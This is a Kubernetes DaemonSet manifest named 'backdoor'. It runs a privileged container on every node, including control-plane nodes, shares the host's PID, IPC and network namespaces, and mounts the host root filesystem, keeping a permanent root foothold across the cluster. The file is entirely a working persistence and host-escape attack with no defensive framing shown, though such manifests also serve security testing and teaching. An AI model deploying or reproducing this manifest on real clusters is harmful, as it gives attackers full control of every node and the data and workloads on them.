apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor
spec:
  selector:
    matchLabels:
      app: backdoor
  template:
    metadata:
      name: backdoor
      labels:
        app: backdoor
    spec:
      tolerations:
      - key: node-role.kubernetes.io/control-plane
        operator: Exists
        effect: NoSchedule
      - key: node-role.kubernetes.io/master
        operator: Exists
        effect: NoSchedule
      hostIPC: true
      hostPID: true
      hostNetwork: true
      containers:
      - name: backdoor
        image: nicolaka/netshoot
        command: ["/bin/sh", "-c", "while true; do sleep 1000; done" ]
        securityContext:
          privileged: true
        volumeMounts:
        - name: root
          mountPath: /host
      volumes:
      - name: root
        hostPath:
          path: /
